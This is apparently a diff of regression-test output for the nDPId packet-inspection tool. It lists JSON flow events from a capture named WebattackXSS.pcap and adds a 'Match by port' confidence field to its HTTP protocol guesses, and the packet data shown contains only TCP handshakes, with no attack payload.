+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347506750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347508344,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347508344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347508344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QeJAAD4Gg+6sEAABwKgKMuJUAFDv7LYIAAAAAKACchDdRAAAAgQFtAQCCAoBOvfqAAAAAAEDAwc="}
@@ -1776,17 +1776,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81oFAAD4G706sEAABwKgKMuKYAFBs5yiTAAAAAKACchDnUwAAAgQFtAQCCAoBOv4SAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4562,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":2,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347514648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4pgH3WT1bOcolKAScSCn9AAAAgQFtAQCCAoD5M+HATr+EgEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":3,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01oJAAD4G71WsEAABwKgKMuKYAFBs5yiUB91k9oAQAOVG\/AAAAQEICgE6\/hID5M+H"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347516933,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347517171,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347517171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347517171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PfRAAD4Gh9ysEAABwKgKMuKyAFAJ1z18AAAAAKACchAy6wAAAgQFtAQCCAoBOwCIAAAAAAEDAwc="}
@@ -1816,17 +1816,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347526155,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vM5AAD4GCQKsEAABwKgKMuMSAFBd27WBAAAAAKACchBdugAAAgQFtAQCCAoBOwlPAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4658,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":2,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347526155,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4xLVlk4tXdu1gqAScSBcLAAAAgQFtAQCCAoD5NrEATsJTwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":3,"flow_last_seen":1499347526156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347526156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vM9AAD4GCQmsEAABwKgKMuMSAFBd27WC1ZZOLoAQAOX7MwAAAQEICgE7CU8D5NrE"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
